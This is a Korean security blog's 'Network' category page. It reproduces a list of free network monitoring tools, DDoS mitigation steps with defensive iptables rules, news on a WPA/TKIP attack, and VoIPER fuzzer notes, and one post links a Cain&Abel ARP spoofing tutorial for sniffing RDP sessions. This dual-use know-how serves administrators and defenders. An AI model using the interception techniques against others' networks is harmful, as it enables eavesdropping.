태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'ⓒ Network'에 해당되는 글 61건

  1. 2016.09.07 네트워크 모니터링 도구 20선
  2. 2012.06.01 [Cain&Abel] ARP Spoofing
  3. 2010.01.24 DDOS 대처 방법
  4. 2009.10.21 wireshark GeoIP 지원
  5. 2009.03.16 MS08-067 취약점 정리
  6. 2008.11.10 WPA가 크랙되었다!
  7. 2008.11.06 VoIP 공격 증가
  8. 2008.10.31 voiper - VOIP 보안 취약점 점검 도구
  9. 2008.05.23 Cisco 장비 취약점 진단 도구, Nipper
  10. 2008.01.24 Linksys WRT54G v7 FTPd vulnerability (1)
  11. 2008.01.08 사이버공격 근원지 역추적기술
  12. 2008.01.04 DDOS 공격 툴
  13. 2007.12.30 [ISCW/Device Hardening/Lab4] AutoSecure
  14. 2007.12.26 port knocking 네트웍 방화벽
  15. 2007.12.14 Teredo 터널링, 보안상의 위협
  16. 2007.12.11 [링크스크랩] 네트워크 보안 솔루션의 종류 및 교육 과정
  17. 2007.12.07 sns 역기능 대비
  18. 2007.12.07 ARP스푸핑 공격과 대응
  19. 2007.12.06 VoIP 공격 탐지기술
  20. 2007.11.28 TCL 로 Cisco 라우터에 백도어 심기
  21. 2007.11.27 Sniffing 감지 툴 및 감지 기법
  22. 2007.11.25 오라클 리스너 해킹 (1)
  23. 2007.11.25 오라클 해킹 자료
  24. 2007.11.25 [본문스크랩] [SIP] SIP proxy server + Soft phone *3 + router(NM-..
  25. 2007.11.25 [본문스크랩] 웹서버 DB 해킹에 대한 궁금증해결
  26. 2007.11.25 Reverse Traceroute and Looking Glass Servers in the World
  27. 2007.11.19 시스코 멀티서비스 및 통합 서비스 라우터의 음성 보안
  28. 2007.11.16 uPnP 이용해 방화벽 열기
  29. 2007.11.16 NSA@Home
  30. 2007.11.16 coWPAtty FPGA WPA 크랙

네트워크 모니터링 도구 20선

ⓒ Network 2016.09.07 14:04

출처 : http://www.gfi.com/blog/the-top-20-free-network-monitoring-and-analysis-tools-for-sys-admins/

 

 

 

1. Microsoft Network Monitor

Microsoft Network Monitor is a packet analyzer that allows you to capture, view and analyze network traffic. This tool is handy for troubleshooting network problems and applications on the network. Main features include support for over 300 public and Microsoft proprietary protocols, simultaneous capture sessions, a Wireless Monitor Mode and sniffing of promiscuous mode traffic, amongst others.

MicrosoftNetworkMonitor

When you launch Microsoft Network Monitor, choose which adapter to bind to from the main window and then click “New Capture” to initiate a new capture tab. Within the Capture tab, click “Capture Settings” to change filter options, adapter options, or global settings accordingly and then hit “Start” to initiate the packet capture process.

2. Nagios

Nagios is a powerful network monitoring tool that helps you to ensure that your critical systems, applications and services are always up and running. It provides features such as alerting, event handling and reporting. The Nagios Core is the heart of the application that contains the core monitoring engine and a basic web UI. On top of the Nagios Core, you are able to implement plugins that will allow you to monitor services, applications, and metrics, a chosen frontend as well as add-ons for data visualisation, graphs, load distribution, and MySQL database support, amongst others.

Tip: If you want to try out Nagios without needing to install and configure it from scratch, download Nagios XI and enable the free version. Nagios XI is the pre-configured enterprise class version built upon Nagios Core and is backed by a commercial company that offers support and additional features such as more plugins and advanced reporting.

Note: The free version of Nagios XI is ideal for smaller environments and will monitor up to seven nodes.

NagiosXI

Once you’ve installed and configured Nagios, launch the Web UI and begin to configure host groups and service groups. Once Nagios has had some time to monitor the status of the specified hosts and services, it can start to paint a picture of what the health of your systems look like.

3. OpenNMS

OpenNMS is an open source enterprise grade network management application that offers automated discovery, event and notification management, performance measurement, and service assurance features. OpenNMS includes a client app for the iPhone, iPad or iPod Touch for on-the-go access, giving you the ability to view outages, nodes, alarms and add an interface to monitor.

OpenNMS

Once you successfully login to the OpenNMS web UI, use the dashboard to get a quick ‘snapshot view’ of any outages, alarms or notifications. You can drill down and get more information about any of these sections from the Status drop down menu. The Reports section allows you to generate reports to send by e-mail or download as a PDF.

4. Advanced IP Scanner

Advanced IP Scanner is a fast and easy to use network scanner that detects any network devices (including wireless devices such as mobile phones, printers and WIFI routers) on your network. It allows you to connect to common services such as HTTP, FTP and shared folders if they are enabled on the remote machine. You are also able to wake up and shut down remote computers.

AdvancedIPScanner

The installer allows you to fully install the application on your machine or run the portable version. When you launch Advanced IP Scanner, start by going to Settings > Options to select which resources to scan and how fast/accurate you want the results to be. You can then choose which subnet to scan and proceed with pressing the “Scan” button. Once the scan is complete, expand the results to see which resources you are able to connect to for each discovered device.

5. Capsa Free

Capsa Free is a network analyzer that allows you to monitor network traffic, troubleshoot network issues and analyze packets. Features include support for over 300 network protocols (including the ability to create and customize protocols), MSN and Yahoo Messenger filters, email monitor and auto-save, and customizable reports and dashboards.

Capsa

When you launch Capsa, choose the adapter you want it to bind to and click “Start” to initiate the capture process. Use the tabs in the main window to view the dashboard, a summary of the traffic statistics, the TCP/UDP conversations, as well as packet analysis.

6. Fiddler

Fiddler is a web debugging tool that captures HTTP traffic between chosen computers and the Internet. It allows you to analyze incoming and outgoing data to monitor and modify requests and responses before they hit the browser. Fiddler gives you extremely detailed information about HTTP traffic and can be used for testing the performance of your websites or security testing of your web applications (e.g. Fiddler can decrypt HTTPS traffic).

Fiddler

When you launch Fiddler, HTTP traffic will start to be captured automatically. To toggle traffic capturing, hit F12. You can choose which processes you wish to capture HTTP traffic for by clicking on “All Processes” in the bottom status bar, or by dragging the “Any Process” icon from the top menu bar onto an open application.

7. NetworkMiner

NetworkMiner captures network packets and then parses the data to extract files and images, helping you to reconstruct events that a user has taken on the network – it can also do this by parsing a pre-captured PCAP file. You can enter keywords which will be highlighted as network packets are being captured. NetworkMiner is classed as a Network Forensic Analysis Tool (NFAT) that can obtain information such as hostname, operating system and open ports from hosts.

NetworkMiner

In the example above, I set NetworkMiner to capture packets, opened a web browser and searched for “soccer” as a keyword on Google Images. The images displayed in the Images tab are what I saw during my browser session.

When you load NetworkMiner, choose a network adapter to bind to and hit the “Start” button to initiate the packet capture process.

8. Pandora FMS

Pandora FMS is a performance monitoring, network monitoring and availability management tool that keeps an eye on servers, applications and communications. It has an advanced event correlation system that allows you to create alerts based on events from different sources and notify administrators before an issue escalates.

pandorafms

When you login to the Pandora FMS Web UI, start by going to the ‘Agent detail’ and ‘Services’ node from the left hand navigation pane. From here, you can configure monitoring agents and services.

9. Zenoss Core

Zenoss Core is a powerful open source IT monitoring platform that monitors applications, servers, storage, networking and virtualization to provide availability and performance statistics. It also has a high performance event handling system and an advanced notification system.

ZenossCore

Once you login to Zenoss Core Web UI for the first time, you are presented with a two-step wizard that asks you to create user accounts and add your first few devices / hosts to monitor. You are then taken directly to the Dashboard tab. Use the Dashboard, Events, Infrastructure, Reports and Advanced tabs to configure Zenoss Core and review reports and events that need attention.

10. PRTG Network Monitor Freeware

PRTG Network Monitor monitors network availability and network usage using a variety of protocols including SNMP, Netflow and WMI. It is a powerful tool that offers an easy to use web-based interface and apps for iOS and Android. Amongst others, PRTG Network Monitor’s key features include:

(1) Comprehensive Network Monitoring which offers more than 170 sensor types for application monitoring, virtual server monitoring, SLA monitoring, QoS monitoring

(2) Flexible Alerting, including 9 different notification methods, status alerts, limit alerts, threshold alerts, conditional alerts, and alert scheduling

(3) In-Depth Reporting, including the ability to create reports in HTML/PDF format, scheduled reports, as well as pre-defined reports (e.g. Top 100 Ping Times) and report templates.

Note: The Freeware version of PRTG Network Monitor is limited to 10 sensors.

PRTGNetworkMonitor

When you launch PRTG Network Monitor, head straight to the configuration wizard to get started. This wizard will run you through the main configuration settings required to get the application up and running, including the adding of servers to monitors and which sensors to use.

11. The Dude

The Dude is a network monitoring tool that monitors devices and alerts you when there is a problem. It can also automatically scan all devices on a given subnet and then draw and layout a map of your network.

TheDude

When you launch The Dude, you first choose to connect to a local or remote network and specify credentials accordingly. Click ‘Settings’ to configure options for SNMP, Polling, Syslog and Reports.

12 Splunk

Splunk is a data collection and analysis platform that allows you to monitor, gather and analyze data from different sources on your network (e.g. event logs, devices, services, TCP/UDP traffic, etc). You can set up alerts to notify you when something is wrong or use Splunk’s extensive search, reporting and dashboard features to make the most of the collected data. Splunk also allows you to install ‘Apps’ to extend system functionality.

Note: When you first download and install Splunk, it automatically installs the Enterprise version for you to trial for 60 days before switching to the Free version. To switch to the Free version straight away, go to Manager > Licensing.

Splunk

When you login to the Splunk web UI for the first time, add a data source and configure your indexes to get started. Once you do this you can then create reports, build dashboards, and search and analyze data.

13. Angry IP Scanner

Angry IP Scanner is standalone application that facilitates IP address and port scanning. It is used to scan a range of IP addresses to find hosts that are alive and obtain information about them (including MAC address, open ports, hostname, ping time, NetBios information, etc).

AngryIpScanner

When you execute the application, go to Tools > Preferences to configure Scanning and Port options, then go to Tools > Fetchers to choose what information to gather from each scanned IP address.

14 Icinga 2

Icigna is a Linux based fully open source monitoring application which checks the availability of network resources and immediately notifies users when something goes down. Icigna provides business intelligence data for in depth analysis and a powerful command line interface.

Icigna2_Overview

When you first launch the Icigna web UI, you are prompted for credentials. Once you’ve authenticated, use the navigation menu on the left hand side to manage the configuration of hosts, view the dashboard, reports, see a history of events, and more.

15. Total Network Monitor

Total Network Monitor continuously monitors hosts and services on the local network, notifying you of any issues that require attention via a detailed report of the problem. The result of each probe is classified using green, red, or black colors to quickly show whether the probe was successful, had a negative result or wasn’t able to complete.

TotalNetworkMonitor

When you launch Total Network Monitor, go to Tools > Scan Wizard to have the wizard scan a specified network range automatically and assign the discovered hosts to a group. Alternatively, create a new group manually to start adding devices/hosts individually.

16. NetXMS

NetXMS is a multi-platform network management and monitoring system that offers event management, performance monitoring, alerting, reporting and graphing for the entire IT infrastructure model. NetXMS’s main features include support for multiple operating systems and database engines, distributed network monitoring, auto-discovery, and business impact analysis tools, amongst others. NetXMS gives you the option to run a web-based interface or a management console.

NetXMS

Once you login to NetXMS you need to first go to the “Server Configuration” window to change a few settings that are dependent on your network requirements (e.g. changing the number of data collection handlers or enabling network discovery). You can then run the Network Discovery option for NetXMS to automatically discover devices on your network, or add new nodes by right clicking on “Infrastructure Services” and selecting Tools > Create Node.

17. Xymon

Xymon is a web-based system – designed to run on Unix-based systems – that allows you to dive deep into the configuration, performance and real-time statistics of your networking environment. It offers monitoring capabilities with historical data, reporting and performance graphs.

Xymon

Once you’ve installed Xymon, the first place you need to go is the hosts.cfg file to add the hosts that you are going to monitor. Here, you add information such as the host IP address, the network services to be monitored, what URLs to check, and so on.

When you launch the Xymon Web UI, the main page lists the systems and services being monitored by Xymon. Clicking on each system or service allows you to bring up status information about a particular host and then drill down to view specific information such as CPU utilization, memory consumption, RAID status, etc.

18. WirelessNetView

WirelessNetView is a lightweight utility (available as a standalone executable or installation package) that monitors the activity of reachable wireless networks and displays information related to them, such as SSID, Signal Quality, MAC Address, Channel Number, Cipher Algorithm, etc.

WirelessNetView

As soon as you execute WirelessNetView, it automatically populates a list of all reachable Wi-Fi networks in the area and displays information relevant to them (all columns are enabled by default).

Note: Wireless Network Watcher is a small utility that goes hand in hand with WirelessNetView. It scans your wireless network and displays a list of all computers and devices that are currently connected, showing information such as IP adddress, MAC address, computer name and NIC card manufacturer – all of which can be exported to a html/xml/csv/txt file.

WirelessNetworkWatcher

19. Xirrus Wi-Fi Inspector

Xirrus Wi-Fi Inspector can be used to search for Wi-Fi networks, manage and troubleshoot connections, verify Wi-Fi coverage, locate Wi-Fi devices and detect rogue Access Points. Xirrus Wi-Fi Inspector comes with built-in connection, quality and speed tests.

XirrusWiFiInspector

Once you launch Wi-Fi Inspector and choose an adapter, a list of available Wi-Fi connections is displayed in the “Networks” pane. Details related to your current Wi-Fi connection are displayed in the top right hand corner. Everything pretty much happens from the top ribbon bar – you can run a test, change the layout, edit settings, refresh connections, etc.

20. WireShark

This list wouldn’t be complete without the ever popular WireShark. WireShark is an interactive network protocol analyzer and capture utility. It provides for in-depth inspection of hundreds of protocols and runs on multiple platforms.

WireShark

When you launch Wireshark, choose which interface you want to bind to and click the green shark fin icon to get going. Packets will immediately start to be captured. Once you’ve collected what you need, you can export the data to a file for analysis in another application or use the in-built filter to drill down and analyze the captured packets at a deeper level from within Wireshark itself.

'ⓒ Network' 카테고리의 다른 글

네트워크 모니터링 도구 20선  (0) 2016.09.07
[Cain&Abel] ARP Spoofing  (0) 2012.06.01
DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
Trackbacks 0 : Comments 0

Write a comment


[Cain&Abel] ARP Spoofing

ⓒ Network 2012.06.01 15:35

글과 동영상까지 상세히! RDP 파서까지 이용하여 스니핑하는 방법

 

적을 알아야 분석이 가능하다!

 

http://www.irongeek.com/i.php?page=videos/cain-rdp-terminal-server-mitm-sniff

 

'ⓒ Network' 카테고리의 다른 글

네트워크 모니터링 도구 20선  (0) 2016.09.07
[Cain&Abel] ARP Spoofing  (0) 2012.06.01
DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
Trackbacks 0 : Comments 0

Write a comment


DDOS 대처 방법

ⓒ Network 2010.01.24 23:28

1. 요약

1) 공격목적은 네트웍무력화(트레픽Full,네트웍장비 과부하,서버처리불능)임.  2차 감염이 아님.
   초기엔 중국에서 많이 발생했으나, 최근엔 소스가 국내서버,발신지 IP변조 공격이 주임
   예로는 TCP공격으로는 초당 28,000건 sync공격등, UDP공격으로 과다 트레픽발생 (보통 1~3Giga)

2) 충분한 회선대역폭, 충분한 네트워크장비, 네트워크장비필터링, 보안장비필터링, 서버필터링 설정으로
   피해를 최소화 시킬 수 있습니다.
   상세 대처법은 DDOS방어편에 있습니다.
 

2. 문제점 및 대처법

1) 모니터링 시스템구축 필요
- 트래픽 Full, L3, L4 세션 초과로그, 서버로그에 대해 문제 발생 시 즉각 SMS수신되는 시스템 구축 필요.
  네트워크 장비 로그를 특정 서버에 수집하여, 임계치 초과 등 문제 발생 시 문자 발송.
- 어떤 도메인이 공격 받는지 확인가능해야 한다.
- Cacti 등 트래픽 모니터링 시스템 구축
- 기타 서버 스크립트 이용 주기적 서버 모니터링 ( http://cafe.naver.com/dnspro/591 )

2) 회선 트레픽 Full발생 서비스불가 대비
=> ISP협조로 필터링, 3Giga이상의 여분 대역폭준비가 필요.

3) 80포트로 패킷과다 유입으로 네트웍장비 처리불가(L3 CPU 급증, L4 처리세션 수 초과)
=> DNS로 분산처리

4) 서버 처리능력 초과
=> 예비 웹서버 준비, 처리용량을 증가 시켜놓을 필요있음. 리눅스 웹서버로 10여대 이상운영필요

참고: ISP,네트워크 장비에서 특정IP의 공격시 필터링 할 수는 있으나 L3단에서 현실적으로 필터링 잘 안됨.
(소스변조, 웹포트인 80포트로 공격)

참고: 네트웍장비가 다운되는 이유
=>  장비는 캐쉬테이블에 SRC IP/ DST IP 또는 포트정보를 포함함 Fow정보가 Hash자료 형태로 저장됨.
    이후 테이블 lookup으로 처리
    결국, 다량 Sync공격 -> Hash테이블 증가-> 세션처리불가-> CPU부하증가-> 처리성능감소-> 장비장애
    -> 서비스불능

스위치의 구조는 다음과 같다.                         


         CPU(라우팅테이블,브리지테이블)
                                    |
패킷->------------인터페이스---Cache Table -----인터페이스--------->----------패킷

5) DNS이용 트레픽 분산하여 조치준비

- L4사용하는경우
=> 네임서버에서 리얼서버IP로 변경하여분산.
   ( 전제조건: 리눅스서버로 구성된 충분한 웹서버가 충분되어야 한다. )
   DNS STTL이 5분으로 줄여놓음.
   특정 IP공격에 대비해 사이트 구축 시 L4 WEB서버 VIP는 2개권장
   (DDOS는 여러곳에서 한곳을 공격하는것이므로,분산하는게 효과적이라는 idea에서 착안)

Case1) 특정 VIP로 공격시 DNS에서 A레코더 제거하고, 네트워크 장비에서 해당IP로 유입막으면 해결됨.
Case2) 도메인으로 공격 들어오는경우는 가능한 부분에서 네트워크장비 ACL + 충분한 웹서버증설,
웹서버에서 필터링 밖에 없음.

6) 네트웍장비에서 기본포트외에 유입 차단
- 네트웍장비에서 사전에 비공인IP차단, IANA할당하지 않은주소는 차단
  실제공격시  일부는  존재하지 않은 IP List가 많다.
  예) ip가 0.0.0.1  0.0.0.2 에서 공격 - -
- IP Header이용 TTL값이 일정해지면서 발신지 IP주소가 변하는 SYN Packet차단.
- 기업 네트웍장비에서 ACL로 우선 막고, 트레픽 Full발생시 ISP에 협조요청
IP차단요청(사전에 UDP 80 필터링)
- IPS, Cisco가드 등을 통한 차단 -> 비용발생
- 회선증설에 대비해 여분의 네트웍장비 모듈 사전준비

7) 서버가 최대한 처리량 초과에 대비해 버텨야 한다. 웹서버에 DDOS 방지를 위한 필터링을 준비함.
- 여분 리눅스 웹서버 준비, DDOS 방지기능 사전 설정
- SYN cookies 설정, Linux에서 지원
  http://cr.yp.to/syncookies.html

SYN cookies are now a standard part of Linux and FreeBSD.
They are, unfortunately, not enabled by default under Linux. To enable them, add     
 
  echo 1 > /proc/sys/net/ipv4/tcp_syncookies to your boot scripts.

- IPTABLE의 Recent Module 사용
  http://cafe.naver.com/dnspro/2186

- mod_dosevasive 를 통한 apache 웹서버 Dos 막기
  http://cafe.naver.com/dnspro/2644

- 웹서버 튜닝 - 왼편 DDOS방어 서버편 참고.
 

3. 참고 자료

  아래는 홍석범님이 만든자료중 일부

- 트래픽 모니터링 체계 구축이 시급 : netflow등을 활용, 과다 트래픽의 특성(프로토콜, 대상IP, 피해범위)
파악이 시급

- 피해 범위가 큰 경우 victim(목적지 IP) 즉시 차단
 
  주로 상위 백본장비에서
  => null route       # ip route 1.1.1.1 255.255.255.255 Null 0

- 이후 공격지 IP를 찾아 차단(현실적으로 거의 불가능)
 
  -. access-list
     access-list deny 102 deny ip host 1.1.1.1 any 
  -. iptables 
     iptables ?A INPUT ?s 1.1.1.1 ?j DROP 


- 서버 수준의 공격시(1G이하)에는 Giga가 지원되는 방화벽으로 차단가능
 
  -. 한 IP당 동시 접속량 제한 e 접속량 제한 초과시 IP 자동차단 
  -. 국가별 차단(한국만 접속 가능)

- 네트워크 수준의 공격시에는 상위 기관(IDC,ISP등)의 협조가 필요함.  

# 1Giga이하 DDOS 공격에 대한 상위 백본장비에 세팅할 관련 룰

$iptables -A FORWARD -p icmp -j DROP
$iptables -A FORWARD -m geoip ! --src-cc KR -j DROP
$iptables -A FORWARD -p tcp --syn --dport 80 -m connlimit --connlimit-above 30 -m recent
                                  --name badguy --set -j DROP

# 차단 로그파일  : /var/log/messages

과다 접속으로 실시간 차단된 IP

# cat /proc/net/ipt_recent/badguy

src=192.168.65.15 ttl: 63 last_seen: 1174481 oldest_pkt: 2 last_pkts: 1174481, 1174481


4.  읽어볼만한 사이트


  1. Hardening the TCP/IP stack to SYN attacks : http://www.securityfocus.com/infocus/1729

  2. DoS Design Considerations : General Design Considerations for Secure Networks
       http://www.ciscopress.com/articles/article.asp?p=174313&seqNum=7

  3. Cisco  Defeating DDos :
  http://www.cisco.com/en/US/products/ps5888/products_white_paper0900aecd8011e927.shtml


  4. DDOS 자료 모음 : http://en.wikipedia.org/wiki/DDoS#Distributed_attack

   1) Understanding Denial-of-Service Attacks (US CERT)
   2) "Advisory CA-1997-28 IP Denial-of-Service Attacks" (CERT)
   3) Sop, Paul (2007). P2P Distributed Denial of Service Attack Alert.- http://www.prolexic.com/
   4) The "stacheldraht" distributed denial of service attack tool
   5) Intrusion Detection FAQ: Distributed Denial of Service Attack Tools: trinoo and wintrinoo
   6) US credit card firm fights DDoS attack
   7) Paxson, Vern (2001), An Analysis of Using Reflectors for Distributed Denial-of-Service Attacks
   8) Vaughn, Randal and Evron, Gadi (2006), DNS Amplification Attacks
   9) January 2001 thread on the UNISOG mailing list
   10) Honeynet Project Reverse Challenge
   11) OpenBSD's pf is a packet filter some providers use for exactly this purpose. http://gold.rayservers.com/ddos-protection
   12) "Some IoS tips for Internet Service (Providers) or points" (Mehmet Suzen)

   [edit] External links

   ● RFC 4732 Internet Denial-of-Service Considerations
   ● W3C The World Wide Web Security FAQ
   ● cert.org CERT's Guide to DoS attacks.
   ● surasoft.com - DDoS case study, concepts, and protection.
   ● honeypots.net Papers and presentations on DDoS mitigation techniques.
   ● denialinfo.com DoS attack resources
   ● ddos.org DDoS defence resources
   ● newssocket.com An article regarding a DDoS for hire incident.
   ● linuxsecurity.com An article on preventing DDoS attacks.
   ● Cisco IOS commands to prevent flooding.

 
 5. DDoS공격 조사보고서 중

지난 2월에 있었던 DDoS 공격을 측정하는 샌디에고, 캘리포니아 대학에서의 3주간의 연구에서 발견된 것들이다.
총 1만 2805건의 DDoS 공격이 있었으며, 주당 평균 4000회 이상의 공격이 2000여개의 조직에 상당하는
약 5000개의 인터넷 호스트들을 목표로 이뤄졌다.

공격의 목표에는 인터넷 서비스 업체들은 물론이고, 아카마이 테크놀로지, 아마존닷컴, 아메리카 온라인,
마이크로소프트의 핫메일과 백악관, 그리고 심지어는 전화회선을 이용하는 사용자들까지도 포함됐다.
피해자들의 약 65%는 한번 공격을 받았으며, 18%는 두 번이상 공격을 받았다.
공격은 어디서나 몇 분에서부터 몇일까지 계속됐다

대부분의 공격은 초당 1000패킷 또는 그보다 느린 속도로 기록됐으나, 가장 빠른 공격의 경우에는
초당 67만9000패킷이 공격당했다

[출처] [정리] DDOS 대처 요약본 Ver 1.0 (DNS카페발췌)|작성자 어진


'ⓒ Network' 카테고리의 다른 글

네트워크 모니터링 도구 20선  (0) 2016.09.07
[Cain&Abel] ARP Spoofing  (0) 2012.06.01
DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
Trackbacks 0 : Comments 0

Write a comment


wireshark GeoIP 지원

ⓒ Network 2009.10.21 00:33
새로운 wireshark 1.2버젼에서 GeoIP를 지원하네요.

사용법 : http://www.wireshark.org/lists/wireshark-dev/200902/msg00154.html

GeoIP Database : http://geolite.maxmind.com/download/geoip/database/

사용자 삽입 이미지

'ⓒ Network' 카테고리의 다른 글

[Cain&Abel] ARP Spoofing  (0) 2012.06.01
DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
Trackbacks 0 : Comments 0

Write a comment


MS08-067 취약점 정리

ⓒ Network 2009.03.16 08:52

보안뉴스에서 MS08-067에 대한 내용을 잘 정리해 주었네요.

☞ 기사보기

'ⓒ Network' 카테고리의 다른 글

DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Trackbacks 0 : Comments 0

Write a comment


WPA가 크랙되었다!

ⓒ Network 2008.11.10 11:47
아래는 원문을 번역해 본 것입니다.
대략 요약하면 도쿄에서 열리는 PacSec conference에서 Erik Tews분이 WPA 크랙 방법을 보여준다고 하네요. 기업들은 대부분 WPA로 넘어가고 있는데 이 크랙이 만약 제대로 된 공격이라면 상당한 쇼크를 줄 것으로 예상이 된다고 합니다. 개인 사용자들은 WPA2 및 가상 개인 네트워크(VPN)을 구축하면 되지만 여전히 접속은 WPA로 해야하기 때문에 취약할 수 밖에 없다고 전망하고 있습니다.

원문:http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119258

WPA암호화가 크랙된다!

보안 연구자가 많은 무선 네트워크에서 데이터를 보호하기 위해 사용하는 Wi-Fi Protected Access(WPA)암호화 표준을 부분적으로 크랙하는 방법을 개발했다고 발표했다.
WPA에서 부분적 공격으로 설명된 공격은 다음 주 도쿄에서 PacSec conference에서 거론될 것이다. Erik Tews 연구원은 WPA 암호화 크랙이 가능했던 방법과 라우터에서 랩탑 컴퓨터로 보내지는 데이터를 읽는 방법을 보여줄 것이다. 공격은 또한 라우터에 연결된 클라이언트에 보거스 정보를 보내는데 사용될 수 있다.
이렇게 하는 것은 Tews와 공동연구자 Martin Beck 이 상대적으로 짧은 시간(12~15분)에 WPA를 사용하여 TKIP을 깨는 방법을 찾았기 때문이다.
하지만 그들은 이 특별한 공격으로 PC에서 라우터까지 가는 데이터를 안전하게 하기 위해 사용되는 암호화키는 크랙하지 않았다. 보안 전문가는 TKIP이 사전공격과 같은 무엇인가를 사용하여 크랙될 수 있다는 것을 알았다. 대량의 계산 자원을 사용하여 공격자는 문선 데이터를 안전하게 하기 위해 사용된 키가 무엇인지 엄청난 능숙한 추측을 만들어 근본적으로 암호화를 크랙한다.
하지만 Tews와 Beck의 작업은 사전공격을 포함하지 않는다.
그들이 트릭이 성공하기 위해서 연구자들은 먼저 많은 양의 데이터를 보내어 WPA라우터를 트릭하기 위한 방법을 찾았다. 이것은 쉽게 키를 크랙할 수 있었지만 이 기술은 mathematical breakthrough와 결합된다. 전의 시도보다 더욱 빠르게 WPA를 크랙할수 있도록 했다.

Tews는 다가오는 다음 달에 아카데믹 저널에 암호화 작업을 발표하려고 계획하고 있었다. 공격에 사용된 몇개의 코드가 이주 전에 Beck의 Aircrack-ng의 Wi-Fi 암호화 해킹 툴에 말없이 추가되었다.
WPA는 오늘날 Wi-Fi 네트워크에서 널리 사용되고 1990년대 후반에 개발된 본래의 WEP표준을 대체할 것이라고 간주되었다. 하지만 WEP 이후의 발전후에도 해커들은 그것의 암호화를 깨는 방법을 찾았고 지금 보안 전문가들은 불안해 하고 있다. 상점 체인 T.J. Maxx는 2년동안 훔쳐진 십억개 이상의 신용카드 번호가 US에서 널리 공개된 경험을 한후 WEP에서 WPA 암호화로 업그레이드 하는 과정 중이었다.
WPA2로 알려진 새 무선 표준이 Tews와 Beck에 의해 개발된 공격으로부터 안전하다고 간주된다. 하지만 많은 WPA2 라우터 또한 WPA를 지원한다.

"모든 사람이 말한다.'WPA로 가라. WEP가 깨졌다.'" Ruiu가 말한다. "이것은 WPA에 길들여 지고 있다는 뜻이다"

만약 WPA가 크게 기능발휘하지 못한다면 WPA를 점진적으로 적용해가고 있는 엔터프라이즈 소비자들에게 큰 타격이 될것이라고 무선 네트워크 보안 벤더 AirTight Networks의 상품관리의 부회장이 Sri Sundaralingam이 말했다. 비록 소비자들은 이 공격으로부터 보호하기 위해 WPA2나 가상 개인 네트워크 소프트웨어와 같은 Wi-Fi 기술을 적용할수 있지만 여전히 WPA를 사용하여 네트워크 또는 완전히 크랙된 WEP 표준에 접속할 것이다.


'ⓒ Network' 카테고리의 다른 글

wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Cisco 장비 취약점 진단 도구, Nipper  (0) 2008.05.23
Trackbacks 0 : Comments 0

Write a comment


VoIP 공격 증가

ⓒ Network 2008.11.06 12:33
노르웨이의 허니넷 프로젝트 비영리 기관인 Honeynor에서 지난 달 급증했던 VoIP 서버 공격에 대한 전말을 다룬 블로그입니다.

http://www.honeynor.no/2008/10/19/voip-attacks-are-escalating/

공격자의 사업 모델, gateway 검색방법, Cisco gateway의 잘못된 설정 지적, VoIP 보호 방법 등을 다루고 있습니다.

해당 IP 범위에서 국내에도 공격이 들어올 수 있으니 보안관계자 분들은 참고하시면 좋겠네요.



'ⓒ Network' 카테고리의 다른 글

MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Cisco 장비 취약점 진단 도구, Nipper  (0) 2008.05.23
Linksys WRT54G v7 FTPd vulnerability  (1) 2008.01.24
Trackbacks 0 : Comments 0

Write a comment


voiper - VOIP 보안 취약점 점검 도구

ⓒ Network 2008.10.31 10:09
VoIPER is a security toolkit that aims to allow developers and security researchers
to easily, extensively and automatically test VoIP devices for security vulnerabilties.
It incorporates a fuzzing suite built on the Sulley fuzzing framework, a SIP torturer
tool based on RFC 4475 and a variety of auxilliary modules to assist in crash detection and
debugging. It is cross platform and usable via a command line interface on Linux, Windows
and OS X or a GUI on Windows. The primary goal of VoIPER is to create a toolkit with all
required testing functionality built in and to minimise the amount of effort an auditor
has to put into testing the security of a VoIP code base.

This is a beta release and has not been tested as extensively as I would like. That said,
it includes a number of new and useful fuzzers as well as a new SIP backend that greatly
increases protocol compliance and the ability to traverse the state tree of different
request types. It also means that protocol based crash detection is much more reliable
than before. Certain clients are quite odd in how they respond to fuzzing though (Ekiga
for example) and as a result process based crash detection is still recommended where
possible to avoid false positives.

Also in this release it is possible to register with a server before beginning fuzzing,
view 'voiper.config' to see how to enable this.

In this release fuzzers were added for REGISTER, NOTIFY and SUBSCRIBE as well as new
fuzzers for CANCEL and ACK that aim to get the device into a state where it is expecting
a CANCEL or ACK before fuzzing it.

For the moment the fuzzer incorporates tests for
- SIP INVITE (3 different test suites)
- SIP ACK (Dumb and 'smart' versions)
- SIP CANCEL (Dumb and 'smart' versions)
- SIP NOTIFY
- SIP SUBSCRIBE
- SIP REGISTER
- SIP request structure
- SDP over SIP

This translates to well over 200,000 generated tests covering all SIP attributes
specified in RFC 3261 for the given messages.

It includes other features such as
- Protocol and process based crash detection and recording
- Fuzzer pause/restart functionality (SFF)
- Supports clients that require registration prior to fuzzing
- Simple to expand to new protocols
- As far as possible, protocol compliance
- Target process control (SFF)

SFF : Provided as part of the Sulley Fuzzing Framework, in some cases with my modifications
and fixes

I would like to thank a number of people for their assistance in the development of this software:

